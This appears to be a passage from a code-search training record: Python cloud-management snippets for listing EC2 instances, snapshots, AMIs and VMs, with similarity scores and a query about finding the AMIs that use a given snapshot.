self.compute.virtual_machines.list(\n CONF.azure.resource_group)\n except Exception as e:\n msg = six.text_type(e)\n LOG.exception(msg)\n ex = exception.InstanceListFailure(reason=six.text_type(e))\n raise ex\n else:\n if pages:\n for i in pages:\n instances.append(i.name)\n return instances", "def _create_load_stats(self, context, instance=None):\n values = {}\n\n if instance:\n instances = [instance]\n else:\n self.stats.clear() # re-generating all, so clear old stats\n\n # grab all instances that are not yet DELETED\n filters = {'host': self.host, 'deleted': False}\n instances = db.instance_get_all_by_filters(context,\n {'host': self.host})\n\n for instance in instances:\n self.stats.add_stats_for_instance(instance)\n\n values['current_workload'] = self.stats.calculate_workload()\n values['running_vms'] = self.stats.num_instances\n values['vcpus_used'] = self.stats.num_vcpus_used\n values['stats'] = self.stats\n return values", "def _get_available_regions():\n session = boto3.session.Session()\n\n return session.get_available_regions(service_name='s3')", "def generateInfoInstances(regions):\n print \"Writing instances info to output file %s\" % instances_data_output_file\n with open(instances_data_output_file, 'w') as f3:\n f3.write(\"INSTANCES\\n\")\n f3.write(\"Name\\tinstance ID\\tKEEP-tag\\tproduction\\tinstance_type\\tstate\\tlaunched\\tsecurity_groups\\tregion\\n\\n\")\n for region in regions:\n print \".\" # feedback for user\n instances = getInstances(region)\n for i in instances:\n f3.write(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\"\n % (get_name_tag(i), i.id, getKeepTag(i), isProduction(i), i.instance_type, i.state,\n i.launch_time, getGroups(i), i.region.name))", "def get_list(self, regions = None):\n\n dataInSavedData = False\n if regions == None:\n regions = [\"PHA\", \"STC\", \"JHC\", \"PLK\", \"KVK\", \"ULK\", \"LBK\", \"HKK\", \"PAK\", \"OLK\", \"MSK\", \"JHM\", \"ZLK\", \"VYS\"]\n\n FinalNpArrayList = [[] for i in range(65)]\n\n self.duplicate_handling = []\n\n #For every region:\n for region in regions:\n #gets duplicity of data and deletes them\n if region in self.duplicate_handling:\n print(\"ERROR: duplicitni predani kraje: \" + region + \", data nebyla prevzata podruhe\", file=sys.stderr)\n continue\n else:\n self.duplicate_handling.append(region)\n\n #Gets data of region from instance of class\n if self.saved_data:\n for key in self.saved_data:\n if key == region:\n for x in range(len(FinalNpArrayList)):\n FinalNpArrayList[x] = np.concatenate((FinalNpArrayList[x],self.saved_data[region][1][x]), axis=None)\n dataInSavedData = True\n break\n\n #if instance of class do not have data of region,\n #check if file .pkl.gz of region exists and gets data from it,\n #if not, gets data from parse_region_data function,\n #creates file .pkl.gz of region and saves data into isntance of class:\n if not dataInSavedData:\n PickleExists = True\n try:\n self.saved_data[region] = pickle.load(gzip.open(self.folder + \"/\" + self.cache_filename.format(region),'rb'))\n except FileNotFoundError:\n PickleExists = False\n\n if not PickleExists:\n data = self.parse_region_data(region)\n\n if data == None:\n continue\n\n with gzip.open(self.folder + \"/\" + self.cache_filename.format(region),'wb') as f:\n pickle.dump(data, f)\n self.saved_data[region] = data\n for x in range(len(FinalNpArrayList)):\n FinalNpArrayList[x] = np.concatenate((FinalNpArrayList[x], self.saved_data[region][1][x]), axis=None)\n else:\n for x in range(len(FinalNpArrayList)):\n FinalNpArrayList[x] = np.concatenate((FinalNpArrayList[x], self.saved_data[region][1][x]), axis=None)\n\n return (self.headers, FinalNpArrayList)", "def get_region_dict(self):\n if self.initiated is False:\n raise RuntimeError(\"Initiate first\")\n\n return self._region_dict", "def list_instance_uuids(self):\n return self.list_instances()", "def list_foundation_sdk_instances():\n return jsonify([serialise_instance(instance) for instance in STORE.values() if instance.entity == SDK_ENTITY_NAME])", "def _get_vm_ids_and_names_dict(self):\r\n vm_ids = {}\r\n vm_names = {}\r\n\r\n for content in self.content:\r\n if content['type'].lower() in ('vm', 'virtual machine'):\r\n vm_ids[content['id']] = content['display_name']\r\n vm_names[content['display_name']] = content['id']\r\n\r\n return vm_ids, vm_names", "def _get_data_volumes(vm_):\n ret = []\n volumes = vm_[\"volumes\"]\n for key, value in volumes.items():\n # Verify the required 'disk_size' property is present in the cloud\n # profile config\n if \"disk_size\" not in volumes[key].keys():\n raise SaltCloudConfigError(\n \"The volume '{}' is missing 'disk_size'\".format(key)\n )\n # Use 'HDD' if no 'disk_type' property is present in cloud profile\n if \"disk_type\" not in volumes[key].keys():\n volumes[key][\"disk_type\"] = \"HDD\"\n\n # Construct volume object and assign to a list.\n volume = Volume(\n name=key,\n size=volumes[key][\"disk_size\"],\n disk_type=volumes[key][\"disk_type\"],\n licence_type=\"OTHER\",\n )\n\n # Set volume availability zone if defined in the cloud profile\n if \"disk_availability_zone\" in volumes[key].keys():\n volume.availability_zone = volumes[key][\"disk_availability_zone\"]\n\n ret.append(volume)\n\n return ret", "def get_instances_ids(self):\n reservations = self.__get_reservations()\n instances_ids = []\n instances,_ = self.__get_multi_instances(reservations)\n for instance in instances:\n instances_ids.append(instance.id.encode(\"latin-1\"))\n return instances_ids", "def GetInstanceTags(self, instance, reason=None):\n query = []\n _AppendReason(query, reason)\n return self._SendRequest(HTTP_GET,\n (\"/%s/instances/%s/tags\" %\n (GANETI_RAPI_VERSION, instance)), query, None)", "def get_instance_list():\n return parse_list_output(Popen('nova list --all-tenants'.split(),\n stdout=STDOUT, stderr=STDERR).communicate()[0])", "def list_(args):\n\n # Get Config.py\n cloud = get_current_cloud(args.cloud)\n\n instances = cloud.list_instances()\n print_table(print_instance_summary, headers, instances,\n use_color=args.color)\n return instances", "def get_instance_definitions(cls):\n\n definitions = {}\n for instance in cls._instances:\n for name, nodes in instance._namespace.items():\n if not definitions.has_key(name):\n definitions[name] = []\n for node in nodes:\n definitions[name].append(node)\n return definitions", "def scope(self) -> List[Region]:\n return [self]", "def get_images(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_images = conn.get_all_images(owners=['self'])\n except boto.exception.EC2ResponseError:\n return []\n return region_images", "def get_ec2(self, name: str) -> list:\n filters = [\n {\n 'Name': 'tag:Name',\n 'Values': [name]\n },\n {\n 'Name': 'instance-state-name',\n 'Values': ['running']\n }\n ]\n\n return list(self.ec2.instances.filter(Filters=filters).all())", "def instances(self, endpoint_name=None):\n if endpoint_name is None:\n _, body = self.request('/v1.1/endpoint/instances', 'GET')\n else:\n _, body = self.request('/v1.1/endpoints/%s/instances' % endpoint_name, 'GET')\n return body", "def GetInstances(self, bulk=False, reason=None):\n query = []\n _AppendIf(query, bulk, (\"bulk\", 1))\n _AppendReason(query, reason)\n\n instances = self._SendRequest(HTTP_GET,\n \"/%s/instances\" % GANETI_RAPI_VERSION,\n query, None)\n if bulk:\n return instances\n else:\n return [i[\"id\"] for i in instances]", "def region(self, args):\n m = MessageClass()\n print('123124')\n data = {'list': []}\n data['list'].append({\"Region_Name\": \"us-east-1\"})\n data['list'].append({\"Region_Name\": \"us-east-2\"})\n data['list'].append({\"Region_Name\": \"us-west-1\"})\n data['list'].append({\"Region_Name\": \"us-west-2\"})\n data['list'].append({\"Region_Name\": \"ap-northeast-1\"})\n data['list'].append({\"Region_Name\": \"ap-northeast-2\"})\n data['list'].append({\"Region_Name\": \"ap-south-1\"})\n data['list'].append({\"Region_Name\": \"ap-southeast-1\"})\n data['list'].append({\"Region_Name\": \"ap-southeast-1\"})\n data['list'].append({\"Region_Name\": \"ca-central-1\"})\n data['list'].append({\"Region_Name\": \"eu-central-1\"})\n data['list'].append({\"Region_Name\": \"eu-west-1\"})\n data['list'].append({\"Region_Name\": \"eu-west-2\"})\n data['list'].append({\"Region_Name\": \"eu-west-3\"})\n data['list'].append({\"Region_Name\": \"sa-east-1\"})\n m.data = data\n return m.to_json()", "def get_instances(self, group_name, state_filter=None):\n all = self.ec2Connection.get_all_instances()\n instances = []\n for res in all:\n for group in res.groups:\n if group.id == group_name:\n for instance in res.instances:\n if state_filter == None or instance.state == state_filter:\n instances.append(instance)\n return instances" ]
[ "0.72672004", "0.71622515", "0.68902445", "0.68787754", "0.68357", "0.6603997", "0.6595504", "0.6591907", "0.6584421", "0.6475704", "0.6437322", "0.64160633", "0.63718474", "0.63532615", "0.63506424", "0.63015544", "0.62685406", "0.6161752", "0.6136149", "0.61351824", "0.6126755", "0.60812336", "0.60655797", "0.6022264", "0.60089386", "0.6004393", "0.59942245", "0.59898496", "0.589123", "0.5883361", "0.5872661", "0.58603036", "0.58541673", "0.58457583", "0.5800268", "0.5796591", "0.57805395", "0.5771713", "0.5770449", "0.5766193", "0.5765094", "0.5762233", "0.5756913", "0.57436", "0.57239014", "0.57138705", "0.5705296", "0.56984186", "0.5686035", "0.5685059", "0.56745887", "0.56660414", "0.56640476", "0.5640612", "0.56383765", "0.5626591", "0.5625485", "0.5609489", "0.5598227", "0.5591589", "0.55834985", "0.55668974", "0.55594516", "0.55568403", "0.5539593", "0.5517349", "0.551613", "0.55136704", "0.5512358", "0.54930216", "0.5469659", "0.5467906", "0.54613376", "0.54598606", "0.54404896", "0.54348963", "0.5433849", "0.54322267", "0.54106873", "0.5406872", "0.5398262", "0.53973716", "0.5397213", "0.5384921", "0.5383222", "0.53539944", "0.5353202", "0.53494126", "0.5349383", "0.53447384", "0.53371674", "0.53320545", "0.5328319", "0.53214735", "0.5321038", "0.53162163", "0.5308049", "0.53077346", "0.5306974", "0.5306884" ]
0.7885678
0
retrieve list of AMIs that refer to a given snapshot
def getAmisOf(snapshot, images): amis = [] for im in images: snapshotsOfThisIm = getSnapshotsOf(im) for soti in snapshotsOfThisIm: if soti == snapshot.id: amis.append(im) return amis
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_amis_of(snapshot_id):\n mes_amis = []\n # There has GOT to be a better way. Hmm... maybe not\n keys = Ims.spreadsheet.keys()\n for key in keys:\n if snapshot_id in Ims.spreadsheet[key]['associated_snapshots']:\n mes_amis.append(key)\n return mes_amis", "def getSnapshotsOf(image):\n snapshotIds = []\n deviceMapping = image.block_device_mapping # dict of devices\n devices = deviceMapping.keys()\n for d in devices:\n snapshotId = deviceMapping[d].snapshot_id\n if snapshotId is not None:\n snapshotIds.append(snapshotId.encode())\n return snapshotIds", "def get_snapshots_of(image):\n snapshot_ids = []\n device_mapping = image.block_device_mapping # dict of devices\n devices = device_mapping.keys()\n for device in devices:\n if device_mapping[device].snapshot_id is not None:\n snapshot_ids.append(device_mapping[device].snapshot_id.encode()) # do I need to have 'encode' here?\n return snapshot_ids", "def vm_snapshotlist(args):\n snapshot = args.snapshot\n name = args.name\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n common.pprint(\"Listing snapshots of %s...\" % name)\n snapshots = k.snapshot(snapshot, name, listing=True)\n if isinstance(snapshots, dict):\n common.pprint(\"Vm %s not found\" % name, color='red')\n return\n else:\n for snapshot in snapshots:\n print(snapshot)\n return", "def get(isamAppliance, check_mode=False, force=False):\n return isamAppliance.invoke_get(\"Retrieving snapshots\", \"/snapshots\")", "def getSnapshotsD(region):\n # Can a snapshot belong to more than one AMI? Dunno, keep list just in case (so it never breaks due to it)\n snapshots = getSnapshots(region)\n snapshotsDicts = []\n ims = getImages(region)\n for s in snapshots:\n amis = getAmisOf(s, ims)\n amiIds = []\n amiKeeps = []\n\n if len(amis) == 1:\n amiIds = amis[0].id.encode()\n amiKeeps = getKeepTag(amis[0])\n\n elif len(amis) == 0:\n amiIds = \"-------no-AMI-found\"\n amiKeeps = \"-------no-AMI-found\"\n else:\n for a in amis:\n amiIds.append(a.id.encode())\n amiKeeps.append(getKeepTag(a))\n\n snapshotsDict = {\"id\": s.id,\n \"status\": s.status,\n \"region\": s.region.name,\n \"progress\": s.progress,\n \"start_time\": s.start_time,\n \"volume_id\": s.volume_id,\n \"volume_size\": s.volume_size,\n \"KEEP-tag\": getKeepTag(s),\n \"Name\": get_name_tag(s),\n \"AMI(s)\": amiIds,\n \"AMI_KEEP-tags\": amiKeeps,\n \"PROD\": isProduction(s),\n \"Description\": s.description\n }\n snapshotsDicts.append(snapshotsDict)\n return snapshotsDicts", "def _list_snapshots(self):\n return self.resource.describe_snapshots(\n Filters=[\n {\n 'Name': 'tag:CreatedBy',\n 'Values': [\n 'AutomatedBackup{}'.format(INTERVAL_TYPE.capitalize())\n ]\n }\n ]\n )", "def get_snap_list(mnode):\n\n ret, out, _ = g.run(mnode, \"gluster snapshot list --xml\")\n if ret != 0:\n g.log.error(\"Failed to execute 'snapshot list' on node %s. \"\n \"Hence failed to get the snapshot list.\", mnode)\n return None\n\n try:\n root = etree.XML(out)\n except etree.ParseError:\n g.log.error(\"Failed to parse the gluster snapshot \"\n \"list xml output.\")\n return None\n\n snap_list = []\n for snap in root.findall(\"snapList/snapshot\"):\n snap_list.append(snap.text)\n\n return snap_list", "def snapshots(self, owner=None, restorable_by=None):\r\n rs = self.connection.get_all_snapshots(owner=owner,\r\n restorable_by=restorable_by)\r\n mine = []\r\n for snap in rs:\r\n if snap.volume_id == self.id:\r\n mine.append(snap)\r\n return mine", "def get_snapshot_list(self, base, snappref=\"SPECTRA_\"):\n #print('Looking for spectra in', base)\n powerspectra = FluxPower(maxk=self.max_k)\n for snap in range(30):\n snapdir = os.path.join(base,snappref+str(snap).rjust(3,'0'))\n #We ran out of snapshots\n if not os.path.exists(snapdir):\n snapdir = os.path.join(base,\"PART_\"+str(snap).rjust(3,'0'))\n if not os.path.exists(snapdir):\n snapdir = os.path.join(base, \"snap_\"+str(snap).rjust(3,'0'))\n if not os.path.exists(snapdir):\n continue\n #We have all we need\n if powerspectra.len() == np.size(self.zout):\n break\n try:\n ss = self._get_spectra_snap(snap, base)\n# print('Found spectra in', ss)\n if ss is not None:\n powerspectra.add_snapshot(snap,ss)\n except IOError:\n print(\"Didn't find any spectra because of IOError\")\n continue\n #Make sure we have enough outputs\n if powerspectra.len() != np.size(self.zout):\n raise ValueError(\"Found only\",powerspectra.len(),\"of\",np.size(self.zout),\"from snaps:\",powerspectra.snaps)\n return powerspectra", "def jail_snapshot_list(jnid = ''):\n jname = jnid\n if 'BASE-' in jnid:\n jnid = '/BASE-RW/%s@' % jnid\n else:\n jnid = '/%s@' % jnid\n \n try:\n jsnap = subprocess.check_output(\"zfs list -t snapshot |grep \"+jnid, shell=True)\n except:\n msg = \" ERROR: No zfs snapshots found for '%s'\" % (jnid)\n log(msg)\n return False\n\n jsnap = jsnap.split('\\n')\n jsnapn = []\n for i in jsnap:\n i = i.split(' ')\n while True:\n try:\n i.remove(\"\")\n except ValueError:\n break\n jsnapn.append(i)\n\n lmen = ['Number', \"'%s' current snapshots\" % jname, 'Size']\n del jsnapn[-1]\n jsn = 0\n jsnn = []\n for i in jsnapn:\n jsnn.append([jsn, i[0], i[3]])\n jsn = jsn + 1\n\n return [jsnn, lmen]", "def getami(ec2, glob):\n\treturn [\n\t\ti for i in ec2.images.filter(\n\t\t\tFilters=[{'Name': 'name', 'Values': [glob]}]\n\t\t)\n\t]", "def getSnapshots(self):\n snapshots = []\n for x in self.root.goto('CommonDataObjects/Attachments'):\n for y in x.getList():\n if y['name'] == 'Video Snapshot':\n self.f.seek(y['bidx'])\n blk = Block(self.f)\n sx = blk.goto('res_x').getLong()\n sy = blk.goto('res_y').getLong()\n raw = blk.goto(\"imagedata\").value\n data = zlib.decompress(raw)\n I = np.flipud(np.array(struct.unpack(\"<\" + str(3 * sx * sy) + \"B\", data)).reshape((sy, sx, 3)))\n snapshots.append(I)\n del blk\n return snapshots", "def list_images(self):\n \n logging.debug(\"list_images entered for %s\" % self.machine_name) \n snapshots = cs.list_snapshots()\n res = []\n server_id = self.cloudserver.id\n # find the one for this server\n for snapshot in snapshots:\n img = snapshot.metadata.get(\"instance_uuid\", None)\n # print img\n\n if img == server_id:\n print \"Server %s has snapshot %s\" % (server_id, img)\n res.append(img)\n\n return res", "def database_volume_snapshot_get_list():\n db = database_get()\n\n session = db.session()\n query = session.query(model.VolumeSnapshot)\n\n volume_snapshot_objs = list()\n for volume_snapshot in query.all():\n nfvi_volume_snapshot_data = \\\n json.loads(volume_snapshot.nfvi_volume_snapshot_data)\n nfvi_volume_snapshot = nfvi.objects.v1.VolumeSnapshot(\n nfvi_volume_snapshot_data['uuid'],\n nfvi_volume_snapshot_data['name'],\n nfvi_volume_snapshot_data['description'],\n nfvi_volume_snapshot_data['size_gb'],\n nfvi_volume_snapshot_data['volume_uuid'])\n volume_snapshot_obj = objects.VolumeSnapshot(nfvi_volume_snapshot)\n volume_snapshot_objs.append(volume_snapshot_obj)\n return volume_snapshot_objs", "def RetrieveACISA():\n\tdb = DBConnector()\n\tcur = db.cursor()\n\n\tSQLcmd = \"SELECT * FROM snaps.SNAPsLocation\"\n\tcur.execute(SQLcmd)\n\treturnList = []\n\tcount = 0\n\tfor item in cur.fetchall():\n\t\tcount += 1\n\t\ttmplist = [item[1], item[2], count, str(item[0])]\n\t\treturnList.append(tmplist)\n\treturn returnList", "def items(self):\n if self.__has_contents:\n return [dict(zip(['id', 'description', 'size', 'start_time', 'state'],\n [item['SnapshotId'], item['Description'], item['VolumeSize'],\n item['StartTime'], item['State']]))\n for item in self.__response['Snapshots']]\n else:\n return []", "def list_snapshots(self, detailed=True):\n aname = \"cinder_v%s.list_snapshots\" % self.version\n with atomic.ActionTimer(self, aname):\n return (self._get_client()\n .volume_snapshots.list(detailed))", "def get_ami_by_id ( ec2_conn, ami_id ) :\n amis = ec2_conn.get_all_images( image_ids = [ ami_id ] )\n for ami in amis :\n return ami", "def snapshot_arns(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"snapshot_arns\")", "def getContainerSnapshots(self,node,vmid):\n data = self.connect('get','nodes/%s/lxc/%s/snapshot' % (node,vmid),None)\n return data", "def get_volume_snapshots(self, volume):\n LOG.debug('get_volume_snapshot starts')\n pool_name = self.configuration.rbd_pool\n volume_name = 'volume-%s' % encodeutils.safe_encode(volume[\"id\"])\n snaps_on_vol = self._get_volume_snapshots(pool_name, volume_name)\n snapshots = list()\n if snaps_on_vol is not None:\n for snap in snaps_on_vol:\n snap_name = str(snap[\"name\"])\n item = dict()\n if snap_name.startswith(\"snapshot-\"):\n # snapshot directly created on volume.\n item[\"type\"] = \"volume_snap\"\n item[\"uuid\"] = snap_name[len('snapshot-'):]\n elif snap_name.startswith(\"volume-\") and \\\n snap_name.endswith(\".clone_snap\"):\n # snapshot used for create volume on volume.\n item[\"type\"] = \"clone_snap\"\n item[\"uuid\"] = snap_name[len(\"volume-\"):-len(\".clone_snap\")]\n elif snap_name.startswith(\"backup.\") and \".snap.\" in snap_name:\n # snapshot used for backup volume.\n item[\"type\"] = \"backup_snap\"\n item[\"uuid\"] = \\\n snap_name[len(\"backup.\"):snap_name.index(\".snap.\")]\n else:\n item[\"type\"] = \"\"\n item[\"uuid\"] = \"\"\n snapshots.append(item)\n\n LOG.debug('volume snapshots: %s', snapshots)\n LOG.debug('get_volume_snapshots finished.')\n return snapshots", "def get_snapshots(self) -> SnapshotListing:\n return self.snapshots", "def list_snapshots(session, verbose):\n # type: (Session, bool) -> Union[List[str], List[Dict[str,str]]]\n if not session.network:\n raise ValueError(\"Network must be set to list snapshots\")\n url_tail = \"/{}/{}/{}\".format(\n CoordConstsV2.RSC_NETWORKS, session.network, CoordConstsV2.RSC_SNAPSHOTS\n )\n return _get_list(session, url_tail, {CoordConstsV2.QP_VERBOSE: verbose})", "def share_snapshot_access_get_all_for_snapshot_instance(\n context, snapshot_instance_id, filters=None,\n with_snapshot_access_data=True, session=None):\n session = session or get_session()\n filters = copy.deepcopy(filters) if filters else {}\n filters.update({'share_snapshot_instance_id': snapshot_instance_id})\n\n query = _share_snapshot_instance_access_get_query(context, session)\n\n legal_filter_keys = (\n 'id', 'share_snapshot_instance_id', 'access_id', 'state')\n\n query = exact_filter(\n query, models.ShareSnapshotInstanceAccessMapping, filters,\n legal_filter_keys)\n\n instance_accesses = query.all()\n\n if with_snapshot_access_data:\n instance_accesses = _set_instances_snapshot_access_data(\n context, instance_accesses, session)\n\n return instance_accesses", "def snapshot_arns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"snapshot_arns\")", "def snapshot_arns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"snapshot_arns\")", "def list_amis(self):\n images = self._driver.list_images(ex_owner=self.account_id)\n return images", "def get_snapshot_children(self, snapshot):\n LOG.debug('get_snapshot_children starts.')\n pool_name = self.configuration.rbd_pool\n volume_name = \\\n 'volume-%s' % encodeutils.safe_encode(snapshot[\"volume_id\"])\n snap_name = 'snapshot-%s' % encodeutils.safe_encode(snapshot['id'])\n children = list()\n children_on_snap = \\\n self._get_snapshot_children(pool_name, volume_name, snap_name)\n if children_on_snap is not None:\n for child in children_on_snap:\n item = dict()\n if len(child) == 2:\n item[\"pool_name\"] = child[0]\n item[\"volume_name\"] = child[1]\n if child[1].startswith(\"volume-\"):\n item[\"type\"] = \"volume\"\n item[\"uuid\"] = child[1][len(\"volume-\"):]\n elif uuidutils.is_uuid_like(child[1]):\n item[\"type\"] = \"volume\"\n item[\"uuid\"] = child[1]\n else:\n item[\"type\"] = \"\"\n item[\"uuid\"] = \"\"\n children.append(item)\n\n LOG.debug('snapshot children: %s', children)\n LOG.debug('get_snapshot_children finished.')\n return children", "def get_ami_by_name ( ec2_conn, ami_name ) :\n amis = ec2_conn.get_all_images( filters = { \"name\": [ ami_name ] } )\n for ami in amis :\n return ami", "def derived_snapshots(self):\n start_time = time.time()\n log.debug(\"Getting snaps derived from volume {0}.\".format(self.volume_id))\n derived_snapshots = []\n for snap in self.app.cloud_interface.get_all_snapshots():\n try:\n if snap.volume_id == self.volume_id:\n derived_snapshots.append(snap)\n except EC2ResponseError, e:\n log.warning(\"EC2ResponseError getting snapshot status: {0} \"\n \"(code {1}; status {2})\"\n .format(e.message, e.error_code, e.status))\n log.debug(\"Got snaps derived from volume {0} in {1} seconds: {2}\"\n .format(self.volume_id, time.time() - start_time, derived_snapshots))\n return derived_snapshots", "def list_snapshots(self, detail=False, **params):\n url = 'snapshots'\n list_schema = schema.list_snapshots_no_detail\n if detail:\n url += '/detail'\n list_schema = schema.list_snapshots_with_detail\n if params:\n url += '?%s' % urllib.urlencode(params)\n\n resp, body = self.get(url)\n body = json.loads(body)\n self.validate_response(list_schema, resp, body)\n return rest_client.ResponseBody(resp, body)", "def list_snapshots(project):\n data = {constants.PROJECT_PARAMETER: project}\n res = requests.post(_url + \"list_snapshots/\", data=data,\n auth=(_username, _password))\n if res.status_code == 200:\n snapshots = json.loads(res.content)\n table = PrettyTable(field_names=[\"Snapshot\", \"Parent\"])\n for snapshot in snapshots:\n table.add_row(snapshot)\n click.echo(table.get_string())\n else:\n click.echo(res.content)", "def populate_snapshots(self):\n print \"Populating snapshots info...\"\n snapshots = self.get_all_snapshots()\n\n for i in snapshots:\n\n # find the ami id(s) for this snapshot. API allows for multiple even though I don't think there would be\n associated_ami_ids = self.get_amis_of(i.id)\n\n ami_keep_tags = [Ims.spreadsheet[ami_id]['KEEP_tag'] for ami_id in associated_ami_ids]\n\n self.spreadsheet[i.id] = dict(Name_tag=self.get_name_tag(i), id=i.id, KEEP_tag=self.get_keep_tag(i),\n ami_KEEP_tag=ami_keep_tags, associated_ami_ids=associated_ami_ids,\n PROD_tag=self.is_production(i), start_time=i.start_time,\n region=i.region.name, associated_volume=i.volume_id,\n volume_size=i.volume_size, description=i.description)", "def list(self, arguments):\n instance_name = arguments['<instance>']\n instance_name = self.activate(instance_name)\n\n vmrun = VMrun(self.vmx, user=self.user, password=self.password)\n print(vmrun.listSnapshots())", "def list_snapshots(args):\n html_doc = document.Document(get_code(args.file))\n edition, region, snapshots = html_doc.list(date=args.edition, region=args.region)\n print('Snapshots for {:s} {:%B %d, %Y}'.format(region.capitalize(), edition))\n for i in range(len(snapshots)):\n print('({:2d}) {!r:} -'.format(i, snapshots[i][1]) +\n ' {0:%B} {0.day:2}, {0:%Y %l:%M:%S.%f %p}'.format(snapshots[i][0]))", "def get_snapshots(self):\r\n ec2 = self.get_ec2_connection()\r\n rs = ec2.get_all_snapshots()\r\n all_vols = [self.volume_id] + self.past_volume_ids\r\n snaps = []\r\n for snapshot in rs:\r\n if snapshot.volume_id in all_vols:\r\n if snapshot.progress == '100%':\r\n snapshot.date = dateutil.parser.parse(snapshot.start_time)\r\n snapshot.keep = True\r\n snaps.append(snapshot)\r\n snaps.sort(cmp=lambda x,y: cmp(x.date, y.date))\r\n return snaps", "def snapshoted_instances_query(self):\n if self.row_converter.obj.id is None:\n # For new object query should be empty\n return self.mapping_object.query.filter(\n self.mapping_object.id.is_(None))\n rel_snapshots = models.Relationship.get_related_query(\n self.row_converter.obj, models.Snapshot(),\n ).subquery(\"snapshot_rel\")\n case_statement = sqlalchemy.case(\n [\n (\n rel_snapshots.c.destination_type == models.Snapshot.__name__,\n rel_snapshots.c.destination_id,\n ),\n ],\n else_=rel_snapshots.c.source_id,\n )\n snapshot = models.Snapshot.query.filter(\n models.Snapshot.id == case_statement,\n models.Snapshot.child_type == self.mapping_object.__name__,\n ).options(\n load_only(models.Snapshot.child_id)\n ).subquery('snapshots')\n return self.mapping_object.query.filter(\n self.mapping_object.id == snapshot.c.child_id\n )", "def get_snap_info(mnode):\n\n ret, out, _ = g.run(mnode, \"gluster snapshot info --xml\")\n if ret != 0:\n g.log.error(\"Failed to execute 'snapshot info' on node %s. \"\n \"Hence failed to get the snapshot info.\", mnode)\n return None\n\n try:\n root = etree.XML(out)\n except etree.ParseError:\n g.log.error(\"Failed to parse the gluster snapshot \"\n \"info xml output.\")\n return None\n\n snap_info_list = []\n for snap in root.findall(\"snapInfo/snapshots/snapshot\"):\n snap_info = {}\n for element in snap.getchildren():\n if element.tag == \"snapVolume\":\n info = {}\n for elmt in element.getchildren():\n if elmt.tag == \"originVolume\":\n info[\"originVolume\"] = {}\n for el in elmt.getchildren():\n info[elmt.tag][el.tag] = el.text\n else:\n info[elmt.tag] = elmt.text\n snap_info[element.tag] = info\n else:\n snap_info[element.tag] = element.text\n snap_info_list.append(snap_info)\n return snap_info_list", "def ami_lookup(session, ami_name, version = None):\n if session is None:\n return None\n\n specific = False\n if ami_name.endswith(\".boss\"):\n ami_version = os.environ[\"AMI_VERSION\"] if version is None else version\n if ami_version == \"latest\":\n # limit latest searching to only versions tagged with hash information\n ami_search = ami_name + \"-h*\"\n else:\n ami_search = ami_name + \"-\" + ami_version\n specific = True\n else:\n ami_search = ami_name\n\n client = session.client('ec2')\n response = client.describe_images(Filters=[{\"Name\": \"name\", \"Values\": [ami_search]}])\n if len(response['Images']) == 0:\n if specific:\n print(\"Could not locate AMI '{}', trying to find the latest '{}' AMI\".format(ami_search, ami_name))\n return ami_lookup(session, ami_name, version = \"latest\")\n else:\n return None\n else:\n response['Images'].sort(key=lambda x: x[\"CreationDate\"], reverse=True)\n image = response['Images'][0]\n ami = image['ImageId']\n tag = _find(image.get('Tags', []), lambda x: x[\"Key\"] == \"Commit\")\n commit = None if tag is None else tag[\"Value\"]\n\n return (ami, commit)", "def show_volume_snapshot(self, snapshot, check=True):\n cmd = 'cinder snapshot-show ' + snapshot.id\n\n exit_code, stdout, stderr = self.execute_command(\n cmd, timeout=config.SNAPSHOT_SHOW_TIMEOUT, check=check)\n\n snapshot_table = output_parser.table(stdout)\n show_result = {key: value for key, value in snapshot_table['values']}\n\n if check:\n assert_that(show_result['id'], is_(snapshot.id))\n if snapshot.name:\n assert_that(show_result['name'], is_(snapshot.name))\n if snapshot.description:\n assert_that(show_result['description'],\n is_(snapshot.description))", "def _get_matching_records(self, args, manifest) -> ty.List[dict]:\n if args.all:\n records = manifest._items # type: ty.List[dict]\n else:\n tags = dict(args.tag or [])\n try:\n records = [manifest.locate(args.type[0], **tags)]\n except exceptions.NoMatchingAsset:\n records = []\n return records", "def get_snapshots(dataset=''):\n # filter my tags\n return os.listdir(dataset + ZFS_DEFAULT_SNAPSHOT_DIR)", "def snapshots_created(self):\n # log.debug(\"Getting snaps created for volume {0}\".format(self.volume_id))\n snaps_info = []\n for snap in self._derived_snapshots:\n snap_info = {}\n try:\n if snap.volume_id == self.volume_id:\n snap.update()\n snap_info['snap_id'] = snap.id\n snap_info['snap_progress'] = snap.progress\n snap_info['snap_status'] = snap.status\n snap_info['snap_desc'] = snap.description\n snaps_info.append(snap_info)\n except EC2ResponseError, e:\n log.warning(\"EC2ResponseError getting snapshot status: {0} \"\n \"(code {1}; status {2})\"\n .format(e.message, e.error_code, e.status))\n return snaps_info", "def find_all(v):\n screen = G.DEVICE.snapshot(quality=ST.SNAPSHOT_QUALITY)\n return v.match_all_in(screen)", "def list(self, detailed=True, search_opts=None, marker=None, limit=None,\n sort=None):\n resource_type = \"snapshots\"\n url = self._build_list_url(resource_type, detailed=detailed,\n search_opts=search_opts, marker=marker,\n limit=limit, sort=sort)\n return self._list(url, resource_type, limit=limit)", "def af_list(self) -> list[PinAF]:", "def ls():\n # TODO: listing all availabe containers form sequence\n return", "def GetVMSnapshotsList(self):\n try:\n current = self.vmInstance.get_current_snapshot_name()\n snapshots = self.vmInstance.get_snapshots()\n\n if current and snapshots:\n LOGGER.info('Name of current snapshot of virtual machine \"{}\": \"{}\"'.format(VM_NAME, current))\n LOGGER.info('List of all snapshots:')\n\n for i, snap in enumerate(snapshots):\n LOGGER.info(' {}. \"'.format(i + 1) + snap.get_name() + '\"')\n\n else:\n LOGGER.warning('No snapshots found for virtual machine \"{}\"!'.format(VM_NAME))\n\n except Exception as e:\n snapshots = None\n LOGGER.debug(e)\n LOGGER.error(traceback.format_exc())\n LOGGER.error('An error occured while getting list of snapshots of virtual machine \"{}\"!'.format(VM_NAME))\n\n return snapshots", "def ListSnapshots(self):\n file_names = 